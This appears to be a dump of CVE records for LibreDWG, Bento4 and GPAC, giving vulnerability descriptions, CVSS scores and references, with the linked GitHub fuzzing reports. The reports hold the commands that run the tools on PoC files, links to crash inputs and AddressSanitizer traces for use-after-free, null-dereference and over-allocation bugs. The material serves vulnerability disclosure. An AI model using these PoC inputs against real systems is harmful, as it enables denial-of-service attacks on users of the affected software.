&& "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20015
2019-12-27T01:15:13.647
An issue was discovered in GNU LibreDWG 0.92. Crafted input will lead to an attempted excessive memory allocation in dwg_decode_LWPOLYLINE_private in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643028" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6967607-F26E-477A-8D60-8B0D55594EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643028
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
CVE-2019-20090
2019-12-30T04:15:11.030
An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/461" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/461
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
./mp42ts $poc out poc [test-002.zip](https://github.com/axiomatic-systems/Bento4/files/3938643/test-002.zip) asan output ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts overflows/test-002.mp4-double_free-idx\:0xffffffff-0x0 out ================================================================= ==2623==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000005458 at pc 0x55e3af247add bp 0x7ffd43666410 sp 0x7ffd43666400 READ of size 8 at 0x604000005458 thread T0 #0 0x55e3af247adc in AP4_Sample::GetOffset() const /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 #1 0x55e3af246319 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:436 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233787 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:306 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #8 0x55e3af232459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) 0x604000005458 is located 8 bytes inside of 48-byte region [0x604000005450,0x604000005480) freed by thread T0 here: #0 0x7fd67fdea845 in operator delete(void*, unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f845) #1 0x55e3af247c40 in AP4_LinearReader::SampleBuffer::~SampleBuffer() /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.h:104 #2 0x55e3af2466f5 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:464 #3 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #4 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #5 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #6 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #7 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #8 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) previously allocated by thread T0 here: #0 0x7fd67fde917f in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10e17f) #1 0x55e3af245fa2 in AP4_LinearReader::Advance(bool) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:424 #2 0x55e3af246fa0 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Core/Ap4LinearReader.cpp:532 #3 0x55e3af232717 in FragmentedSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:149 #4 0x55e3af232aa2 in ReadSample /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #5 0x55e3af233927 in WriteSamples /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:317 #6 0x55e3af235970 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:636 #7 0x7fd67f91ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-use-after-free /home/tim/Bento4-asan/Source/C++/Core/Ap4Sample.h:99 in AP4_Sample::GetOffset() const Shadow bytes around the buggy address: 0x0c087fff8a30: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a40: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a50: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a60: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8a70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd =>0x0c087fff8a80: fa fa fd fd fd fd fd fa fa fa fd[fd]fd fd fd fd 0x0c087fff8a90: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c087fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2623==ABORTING root@ubuntu:/home/tim/Bento4/cmakebuild# ```
use after free in Ap4Sample.h
https://api.github.com/repos/axiomatic-systems/Bento4/issues/461/comments
0
2019-12-09T08:53:39Z
2019-12-09T08:53:39Z
https://github.com/axiomatic-systems/Bento4/issues/461
534,780,352
461
CVE-2019-20091
2019-12-30T04:15:11.123
An issue was discovered in Bento4 1.5.1.0. There is a NULL pointer dereference in AP4_Descriptor::GetTag in mp42ts when called from AP4_DecoderConfigDescriptor::GetDecoderSpecificInfoDescriptor in Ap4DecoderConfigDescriptor.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/462" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/462
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
./mp42ts $poc out poc [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/3938679/poc1.zip) [poc2.zip](https://github.com/axiomatic-systems/Bento4/files/3938680/poc2.zip) asan output 1 ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts crashes/test-001.mp4-signalb-0x0 out AddressSanitizer:DEADLYSIGNAL ================================================================= ==4527==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x5641267801c3 bp 0x7ffe30da6fb0 sp 0x7ffe30da6fa0 T0) ==4527==The signal is caused by a READ memory access. ==4527==Hint: address points to the zero page. #0 0x5641267801c2 in AP4_Descriptor::GetTag() (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) #1 0x5641267802af in AP4_DescriptorFinder::Test(AP4_Descriptor*) const (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3972af) #2 0x564126780d9c in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/tim/Bento4-asan/Source/C++/Core/Ap4List.h:431 #3 0x56412677fe05 in AP4_DecoderConfigDescriptor::GetDecoderSpecificInfoDescriptor() const /home/tim/Bento4-asan/Source/C++/Core/Ap4DecoderConfigDescriptor.cpp:159 #4 0x564126735776 in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:591 #5 0x564126735f95 in AP4_MpegAudioSampleDescription::AP4_MpegAudioSampleDescription(unsigned int, unsigned short, unsigned short, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:697 #6 0x56412673c990 in AP4_MpegAudioSampleEntry::ToSampleDescription() /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleEntry.cpp:678 #7 0x5641267ddc0f in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4StsdAtom.cpp:181 #8 0x56412676f4e0 in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4AtomSampleTable.cpp:207 #9 0x564126745914 in AP4_Track::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4Track.cpp:445 #10 0x5641267113a0 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:563 #11 0x7fd96c6d3b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #12 0x56412670e459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) in AP4_Descriptor::GetTag() ==4527==ABORTING ``` 2 ``` root@ubuntu:/home/tim/Bento4/cmakebuild# ../../Bento4-asan/cmakebuild/mp42ts crashes/test-001.mp4-signalb-0x4 out AddressSanitizer:DEADLYSIGNAL ================================================================= ==4528==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x560f0b6bc1c3 bp 0x7ffc50b88480 sp 0x7ffc50b88470 T0) ==4528==The signal is caused by a READ memory access. ==4528==Hint: address points to the zero page. #0 0x560f0b6bc1c2 in AP4_Descriptor::GetTag() (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) #1 0x560f0b6bc2af in AP4_DescriptorFinder::Test(AP4_Descriptor*) const (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3972af) #2 0x560f0b6bcd9c in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/tim/Bento4-asan/Source/C++/Core/Ap4List.h:431 #3 0x560f0b6c3f1f in AP4_EsDescriptor::GetDecoderConfigDescriptor() const /home/tim/Bento4-asan/Source/C++/Core/Ap4EsDescriptor.cpp:207 #4 0x560f0b671417 in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:583 #5 0x560f0b671f95 in AP4_MpegAudioSampleDescription::AP4_MpegAudioSampleDescription(unsigned int, unsigned short, unsigned short, AP4_EsdsAtom*) /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleDescription.cpp:697 #6 0x560f0b678990 in AP4_MpegAudioSampleEntry::ToSampleDescription() /home/tim/Bento4-asan/Source/C++/Core/Ap4SampleEntry.cpp:678 #7 0x560f0b719c0f in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4StsdAtom.cpp:181 #8 0x560f0b6ab4e0 in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4AtomSampleTable.cpp:207 #9 0x560f0b681914 in AP4_Track::GetSampleDescription(unsigned int) /home/tim/Bento4-asan/Source/C++/Core/Ap4Track.cpp:445 #10 0x560f0b64d3a0 in main /home/tim/Bento4-asan/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:563 #11 0x7f5eaef1fb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #12 0x560f0b64a459 in _start (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x325459) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/tim/Bento4-asan/cmakebuild/mp42ts+0x3971c2) in AP4_Descriptor::GetTag() ==4528==ABORTING ```
2 segv in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/462/comments
0
2019-12-09T09:00:42Z
2019-12-09T09:00:42Z
https://github.com/axiomatic-systems/Bento4/issues/462
534,783,741
462
CVE-2019-20159
2019-12-31T00:15:12.243
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a memory leak in dinf_New() in isomedia/box_code_base.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1321" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1321
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
